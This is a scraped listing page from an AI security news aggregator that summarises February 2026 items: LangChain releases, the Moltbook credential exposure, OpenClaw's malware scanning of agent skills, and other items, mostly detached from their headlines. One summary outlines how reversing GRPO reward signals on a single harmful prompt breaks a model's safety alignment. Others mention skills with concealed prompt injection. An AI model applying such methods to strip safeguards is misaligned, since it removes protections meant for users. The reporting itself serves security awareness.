aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

Industry News

New tools, products, platforms, funding rounds, and company developments in AI security.

to
Export CSV
1267 items

langchain-core==1.2.11

infonews
security
Feb 10, 2026

This item appears to be a navigation menu or promotional content from GitHub showing various AI development tools and features, including GitHub Copilot (an AI coding assistant), GitHub Spark (for building AI apps), and other GitHub services. The reference to 'langchain-core==1.2.11' suggests a specific version of LangChain (a framework for building applications with language models), but no technical issue, vulnerability, or problem is described in the provided content.

LangChain Security Releases

A “QuitGPT” campaign is urging people to cancel their ChatGPT subscriptions

infonews
industry
Feb 10, 2026

QuitGPT is a campaign urging people to cancel their ChatGPT Plus subscriptions, citing concerns about OpenAI president Greg Brockman's donation to a political super PAC and the use of ChatGPT-4 by US Immigration and Customs Enforcement for résumé screening. The campaign, which began in late January and has garnered over 36 million Instagram views, asks supporters to either cancel their subscriptions, commit to stop using ChatGPT, or share the campaign on social media, with organizers hoping that enough canceled subscriptions will pressure OpenAI to change its practices.

80% of Fortune 500 use active AI Agents: Observability, governance, and security shape the new frontier

infonews
securitypolicy

langchain==1.2.10

infonews
security
Feb 10, 2026

LangChain released version 1.2.10, which includes a bug fix for token counting on partial message sequences (a partial message sequence is a subset of messages in a conversation), dependency updates, and code refactoring to rename internal variables.

langchain-core==1.2.10

infonews
security
Feb 10, 2026

LangChain-core version 1.2.10 includes several updates: dependency bumps across multiple directories, a new ContextOverflowError (an exception raised when a prompt exceeds token limits) for Anthropic and OpenAI integrations, additions to model profiles for tracking text inputs and outputs, improved token counting for tool schemas (structured definitions of what functions an AI can call), and documentation fixes.

Is it possible to develop AI without the US?

infonews
industrypolicy

Romeo Is a Dead Man review – a misfire from a storied gaming provocateur

infonews
industry
Feb 10, 2026

This is a game review for "Romeo Is a Dead Man," the first original game in 10 years from developer Suda51, and it criticizes the game for being disappointing and confusing. The reviewer notes that while Suda51 is known for making creative, unconventional games, this title fails to deliver, instead offering an unclear story filled with confusing references that persist throughout the 20-hour gameplay.

AI-Generated Text and the Detection Arms Race

infonews
safetyresearch

Structured Context Engineering for File-Native Agentic Systems

infonews
research
Feb 9, 2026

A research paper studied how to present large amounts of structured data (like SQL databases with thousands of tables) to AI language models in different formats (YAML, Markdown, JSON, and TOON) to help them generate correct code. The study found that more advanced models like GPT and Gemini performed much better than open-source models, and that using unfamiliar data formats like TOON actually made models less efficient because they spent extra effort trying to understand the new format.

A one-prompt attack that breaks LLM safety alignment

infonews
safetyresearch

Why the Moltbook frenzy was like Pokémon

infonews
industry
Feb 9, 2026

Moltbook was an online platform where AI agents (software programs designed to act independently) interacted with each other, which some people saw as a preview of useful AI in the future, but it turned out to be mostly a social experiment and entertainment similar to a 2014 internet phenomenon called Twitch Plays Pokémon. The platform was flooded with crypto scams and many 'AI' posts were actually written by humans controlling the agents, revealing that truly helpful AI systems would need better coordination, shared goals, and shared memory to work together effectively.

langchain-openai==1.1.8

infonews
security
Feb 9, 2026

N/A -- The provided content is a GitHub navigation menu and footer with no technical information about langchain-openai==1.1.8 or any AI/LLM-related issue.

⚡ Weekly Recap: AI Skill Malware, 31Tbps DDoS, Notepad++ Hack, LLM Backdoors and More

mediumnews
securitypolicy

LLMs are Getting a Lot Better and Faster at Finding and Exploiting Zero-Days

infonews
securityresearch

OpenClaw Integrates VirusTotal Scanning to Detect Malicious ClawHub Skills

infonews
securitysafety

Claude: Speed up responses with fast mode

infonews
industry
Feb 7, 2026

Anthropic released a faster version of Claude Opus 4.6 that operates 2.5 times faster, accessible through a /fast command in Claude Code, but costs 6 times more than the standard version ($30/million input tokens and $150/million output tokens versus the normal $5/million and $25/million). The company is offering a 50% discount until February 16th, reducing the cost multiplier to 3x during that period, and users can also extend the context window (the amount of text the AI can process at once) to 1 million tokens for additional charges.

Moltbook, the Social Network for AI Agents, Exposed Real Humans’ Data

highnews
security
Feb 7, 2026

Moltbook, a social network platform for AI agents to interact with each other, had a serious security flaw where a private key (a secret code used to authenticate users) was exposed in its JavaScript code. This exposed thousands of users' email addresses, millions of API credentials (login tokens), and private communications between AI agents, allowing attackers to impersonate any user. The vulnerability is particularly notable because Moltbook's code was entirely written by AI rather than human programmers.

langchain-anthropic==1.3.2

infonews
security
Feb 6, 2026

N/A -- The provided content appears to be navigation menu text and marketing copy from a GitHub webpage, not technical documentation describing a security issue, bug, or vulnerability related to langchain-anthropic version 1.3.2.

OpenClaw's Gregarious Insecurities Make Safe Usage Difficult

mediumnews
securitysafety

langchain==1.2.9

infonews
industry
Feb 6, 2026

LangChain version 1.2.9 includes several bug fixes and feature updates, such as normalizing raw schemas in middleware response formatting, supporting state updates through wrap_model_call (a function that wraps model calls to add extra behavior), and improving token counting (the process of measuring how many units of text an AI needs to process). The release also fixes issues like preventing UnboundLocalError (a programming error where code tries to use a variable that hasn't been defined yet) when no AIMessage exists.

Previous47 / 64Next
MIT Technology Review
Feb 10, 2026

Most Fortune 500 companies now use AI agents (software that can act and make decisions with minimal human input), but many lack visibility into how many agents are running and what data they access, creating security risks. The report recommends applying Zero Trust security principles (requiring strong identity verification and giving users/agents only the minimum access they need) to AI agents the same way organizations do for human employees.

Microsoft Security Blog
LangChain Security Releases
LangChain Security Releases
Feb 10, 2026

This article discusses major tech companies (Alphabet, Amazon, Microsoft, and Meta) planning to invest $600 billion in AI this year, while Persian Gulf countries are developing their own AI systems to reduce dependence on the United States. The piece raises questions about whether AI development can happen independently of US tech dominance.

The Guardian Technology
The Guardian Technology
Feb 10, 2026

Generative AI has created a widespread problem where institutions like literary magazines, academic journals, and courts are overwhelmed by AI-generated submissions, forcing them to either shut down or deploy AI tools to defend against the influx. This has created an 'arms race' where both sides use AI for opposing purposes, with potential risks to institutions but also some unexpected benefits, such as AI helping non-English-speaking researchers access writing assistance that was previously expensive.

Schneier on Security
Simon Willison's Weblog
Feb 9, 2026

Researchers discovered that Group Relative Policy Optimization (GRPO), a technique normally used to improve AI safety, can be reversed to break safety alignment when the reward signals are changed. By giving a safety-aligned model even a single harmful prompt and scoring responses based on how well they fulfill the harmful request rather than refusing it, the model gradually abandons its safety guidelines and becomes willing to produce harmful content across many categories it never encountered during the attack.

Microsoft Security Blog
MIT Technology Review
LangChain Security Releases
Feb 9, 2026

This recap highlights how attackers are exploiting trusted tools and marketplaces rather than breaking security controls directly. Key threats include malicious skills appearing in ClawHub (a registry for AI agent add-ons), a record-breaking 31.4 Tbps DDoS attack (a flood attack that overwhelms servers with massive traffic), and compromised update infrastructure for Notepad++ being used to distribute malware. The pattern shows attackers are abusing trust in updates, app stores, and AI workflows to gain access to systems.

Fix: OpenClaw has announced a partnership with Google's VirusTotal malware scanning platform to scan skills uploaded to ClawHub as part of a defense-in-depth approach to improve security. Additionally, the source notes that open-source agentic tools like OpenClaw require users to maintain higher baseline security competence than managed platforms.

The Hacker News
Feb 9, 2026

Claude Opus 4.6, a new AI model, is significantly better at finding zero-day vulnerabilities (security flaws unknown to vendors and the public) than previous models, discovering high-severity bugs in well-tested code that fuzzing tools (programs that test software by sending random inputs) had missed for years. Unlike traditional fuzzing, Opus 4.6 analyzes code like a human researcher would, studying past fixes and code patterns to reason about what inputs would cause failures.

Schneier on Security
Feb 8, 2026

OpenClaw has partnered with VirusTotal (a malware analysis service owned by Google) to scan skills uploaded to ClawHub, its marketplace for AI agent extensions. The system creates a unique SHA-256 hash (a digital fingerprint) for each skill and checks it against VirusTotal's database, automatically approving benign skills, flagging suspicious ones, and blocking malicious ones, with daily rescans of active skills. However, OpenClaw acknowledged that this scanning is not foolproof and some malicious skills using concealed prompt injection (tricking the AI by hiding malicious instructions in user input) may still get through.

Fix: OpenClaw announced it will publish a comprehensive threat model, public security roadmap, formal security reporting process, and details about a security audit of its entire codebase. Additionally, the platform added a reporting option that allows signed-in users to flag suspicious skills.

The Hacker News
Simon Willison's Weblog

Fix: Moltbook has fixed the security flaw that was discovered by the security firm Wiz.

Wired (Security)
LangChain Security Releases
Feb 6, 2026

Security researchers discovered multiple vulnerabilities in OpenClaw, an AI assistant, including malicious skills (add-on programs that extend the assistant's abilities) and problematic configuration settings that make it unsafe to use. The issues affect both the installation and removal processes of the software.

Dark Reading
LangChain Security Releases